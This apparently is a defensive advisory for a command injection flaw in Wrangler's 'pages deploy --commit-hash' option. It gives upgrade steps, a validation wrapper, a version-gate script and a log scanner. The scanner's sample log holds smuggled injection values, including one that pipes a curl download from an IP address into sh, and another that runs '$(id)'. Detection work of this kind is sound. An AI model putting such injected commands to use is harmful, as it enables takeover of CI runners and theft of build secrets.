CVE-2026-0933
📋 TL;DR
A command injection vulnerability in Wrangler's `pages deploy` command allows attackers who control the `--commit-hash` parameter to execute arbitrary shell commands. This primarily affects CI/CD environments where the parameter is populated from external sources. Successful exploitation could lead to complete compromise of the CI runner.
💻 Affected Systems
- Cloudflare Wrangler
📦 What is this software?
Wrangler is Cloudflare's command-line tool for building and deploying Workers and Pages projects. `wrangler pages deploy` uploads a built site to Cloudflare Pages, and its `--commit-hash` option lets the caller record the source commit for that deployment, which is why CI/CD pipelines commonly feed it a value taken from the build context.
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of CI/CD infrastructure, installation of persistent backdoors, exfiltration of sensitive data and credentials, and modification of build artifacts.
Likely Case
Limited command execution in CI environments where commit-hash values come from untrusted sources, potentially exposing environment variables and build secrets.
If Mitigated
No impact if proper input validation is implemented or if commit-hash values are controlled and validated.
🎯 Exploit Status
Exploitation requires control over the --commit-hash parameter, typically through CI/CD pipeline manipulation or untrusted input sources.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Wrangler v4.59.1+ or v3.114.17+
Vendor Advisory: https://github.com/cloudflare/workers-sdk
Restart Required: No
Instructions:
1. Check the Wrangler version the pipeline actually runs: `wrangler --version` for a global install, `npx wrangler --version` (or the lockfile entry) for a project-local one.
2. For v4: upgrade to v4.59.1 or later, for example with `npm install -g wrangler@latest`, or by bumping the project dependency and lockfile.
3. For v3: upgrade to v3.114.17 or later with `npm install -g wrangler@3`; a plain `npm update -g wrangler` may move a v3 install onto the v4 line instead, so pin the major explicitly if you need to stay on v3.
4. For v2: no fixed v2 release exists; migrate to a supported v3 or v4 version.
🔧 Temporary Workarounds
Input validation wrapper
Create a wrapper script that validates the commit-hash value before it reaches wrangler, and make the pipeline call the wrapper instead of wrangler directly. The regex is kept in a variable so the `{7,64}` quantifier is not subject to brace expansion.

```bash
#!/usr/bin/env bash
set -euo pipefail
# Usage: safe-pages-deploy.sh <commit-hash> [further wrangler pages deploy arguments]
# Accept only a git commit id: 7 to 64 hex characters, nothing else.
hash_re='^[0-9a-fA-F]{7,64}$'
if [[ ! ${1:-} =~ $hash_re ]]; then
  echo "Invalid commit hash, refusing to run wrangler" >&2
  exit 1
fi
hash=$1; shift
wrangler pages deploy "$@" --commit-hash "$hash"
```

The wrapper only protects the pipelines that go through it; any job that still invokes `wrangler pages deploy --commit-hash` directly remains exposed until it is upgraded.
🧯 If You Can't Patch
- Remove or restrict use of --commit-hash parameter in CI/CD pipelines
- Implement strict input validation for commit-hash values from external sources
🔍 How to Verify
Check if Vulnerable:
You are exposed if the Wrangler that the pipeline actually runs (`wrangler --version`, or `npx wrangler --version` for a project-local install) is a 4.x release below 4.59.1, a 3.x release below 3.114.17, or any 2.x release, and a `pages deploy` step passes `--commit-hash` a value that an outside party can influence (for example, one taken from a webhook payload or a pull request rather than from the checked-out commit itself).
Check Version:
wrangler --version
Verify Fix Applied:
Verify upgraded to patched version with `wrangler --version` and ensure version is v4.59.1+ or v3.114.17+.
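The version check above is easy to get wrong by hand (4.100.0 sorts after 4.59.1, and a prerelease such as 4.59.1-beta.0 sorts before it). The script below is an added example, not Cloudflare's code and not part of the original advisory: a CI gate that parses the `wrangler --version` banner, classifies the version against the fixed releases this advisory names (4.59.1 on the 4.x line, 3.114.17 on the 3.x line, nothing on 2.x), and refuses to proceed on an affected build. It assumes `wrangler --version` prints the version as x.y.z somewhere in its output; the banner text used at the bottom is a constructed sample.

```shell
#!/usr/bin/env bash
# Added example (not Cloudflare's or the advisory's code): gate a CI job on the
# installed Wrangler version for CVE-2026-0933.
# Assumptions: `wrangler --version` prints x.y.z somewhere in its output, and a
# prerelease of a fixed version (e.g. 4.59.1-beta.0) does not yet contain the fix.

# parse_wrangler_version TEXT -> prints the first x.y.z found in TEXT, exit 1 if none
parse_wrangler_version() {
  [[ $1 =~ [0-9]+\.[0-9]+\.[0-9]+ ]] || return 1
  echo "${BASH_REMATCH[0]}"
}

# version_lt A B -> exit 0 when dotted numeric version A is strictly lower than B
version_lt() {
  local -a a b
  local i x y
  IFS=. read -r -a a <<<"$1"
  IFS=. read -r -a b <<<"$2"
  for i in 0 1 2; do
    x=${a[i]:-0}; y=${b[i]:-0}
    (( 10#$x < 10#$y )) && return 0
    (( 10#$x > 10#$y )) && return 1
  done
  return 1   # equal
}

# wrangler_status VERSION -> prints affected | patched | unknown
wrangler_status() {
  local v=${1#v} pre=0 fixed
  [[ $v == *-* ]] && pre=1          # prerelease marker, e.g. 4.59.1-beta.0
  v=${v%%[-+]*}                     # drop prerelease/build metadata for the numeric compare
  case ${v%%.*} in
    4) fixed=4.59.1 ;;
    3) fixed=3.114.17 ;;
    0|1|2) echo affected; return ;;  # v2 and older: no fixed release, migrate to v3/v4
    *) echo unknown; return ;;       # a major line this advisory does not describe
  esac
  if version_lt "$v" "$fixed" || { (( pre )) && [[ $v == "$fixed" ]]; }; then
    echo affected
  else
    echo patched
  fi
}

# check_wrangler_output TEXT -> verdict for the raw output of `wrangler --version`
check_wrangler_output() {
  local v
  v=$(parse_wrangler_version "$1") || { echo unknown; return; }
  wrangler_status "$v"
}

# Pipeline gate. Real use:  gate_deploy "$(npx wrangler --version 2>/dev/null)"
gate_deploy() {
  local verdict
  verdict=$(check_wrangler_output "$1")
  case $verdict in
    patched) echo "wrangler is patched, continuing" ;;
    *) echo "refusing to run pages deploy: wrangler version is $verdict" >&2; return 1 ;;
  esac
}

# Constructed sample banner standing in for a real `wrangler --version` run
gate_deploy ' ⛅️ wrangler 4.58.0' || true
```

Run the gate before the deploy step with the same `wrangler` (global or `npx`) that the deploy step will use; an `unknown` verdict is treated as a failure on purpose so that a future major line is reviewed rather than silently trusted.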
📡 Detection & Monitoring
Log Indicators:
- Unusual shell commands in CI/CD logs following wrangler pages deploy execution
- Multiple failed wrangler deploy attempts with unusual commit-hash values
Network Indicators:
- Unexpected outbound connections from CI runners following wrangler execution
SIEM Query:
process.name:"wrangler" AND command_line:"pages deploy" AND command_line:"--commit-hash"
This query returns every `pages deploy` that sets `--commit-hash`, legitimate deploys included. Triage by extracting the value and flagging anything that is not a plain hex commit id: quotes, `;`, `|`, `&&`, `$(` or backticks in that position are the indicator worth escalating.
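To turn the triage step into something repeatable, the script below is an added example (not from the advisory or from Cloudflare) that hunts over CI/CD log lines for `wrangler pages deploy` runs whose `--commit-hash` value is not a plain git commit id. It handles `--commit-hash=VALUE`, `--commit-hash VALUE`, and single- or double-quoted values, and it skips lines that are not `pages deploy` invocations or that carry no `--commit-hash` at all. It assumes each log line contains the full wrangler command line; the log lines at the bottom are constructed samples, not real CI output. A flagged value is not proof of exploitation, but it is exactly the shape an injection attempt through this parameter takes.

```shell
#!/usr/bin/env bash
# Added example, not from the advisory or from Cloudflare: hunt CI/CD logs for
# `wrangler pages deploy` runs whose --commit-hash value is not a plain commit id.
# Assumption: each log line carries the full wrangler command line.

# extract_commit_hash LINE -> prints the --commit-hash value (quoted or bare, `=` or
# space separated); exit 1 when the flag is absent
extract_commit_hash() {
  local dq='"' sq="'"
  local re="--commit-hash[=[:space:]]+(${dq}([^${dq}]*)${dq}|${sq}([^${sq}]*)${sq}|([^[:space:]${dq}${sq}][^[:space:]]*))"
  [[ $1 =~ $re ]] || return 1
  # exactly one of groups 2, 3, 4 is populated depending on the quoting style
  printf '%s\n' "${BASH_REMATCH[2]}${BASH_REMATCH[3]}${BASH_REMATCH[4]}"
}

# is_clean_commit_hash VALUE -> exit 0 for 7 to 64 hex characters (abbreviated SHA-1 up to SHA-256)
is_clean_commit_hash() {
  local re='^[0-9a-fA-F]{7,64}$'
  [[ $1 =~ $re ]]
}

# scan_deploy_log < LOG -> reports suspicious lines on stderr, prints the count on stdout
scan_deploy_log() {
  local line hash count=0
  while IFS= read -r line; do
    [[ $line == *"pages deploy"* ]] || continue
    hash=$(extract_commit_hash "$line") || continue
    if ! is_clean_commit_hash "$hash"; then
      printf 'SUSPICIOUS --commit-hash %q in: %s\n' "$hash" "$line" >&2
      count=$((count + 1))
    fi
  done
  echo "$count"
}

# Constructed sample log lines (not real CI output). Lines 2 and 3 should be flagged;
# line 4 is not a pages deploy and line 5 has no --commit-hash.
SAMPLE_LOG='2026-01-14T10:02:11Z runner[1] npx wrangler pages deploy ./dist --project-name web --commit-hash 9fceb02d0ae598e95dc970b74767f19372d61af8
2026-01-14T10:05:42Z runner[2] npx wrangler pages deploy ./dist --project-name web --commit-hash "abc1234; curl http://198.51.100.7/x | sh"
2026-01-14T10:07:03Z runner[3] npx wrangler pages deploy ./dist --project-name web --commit-hash=$(id)
2026-01-14T10:09:30Z runner[4] npx wrangler deploy --commit-hash 0123abc
2026-01-14T10:11:00Z runner[5] npx wrangler pages deploy ./dist --project-name web'

scan_deploy_log <<<"$SAMPLE_LOG"
```

Feed it the exported CI job logs (`scan_deploy_log < job.log`) and review anything reported on stderr; the count on stdout makes it easy to alert when it is non-zero.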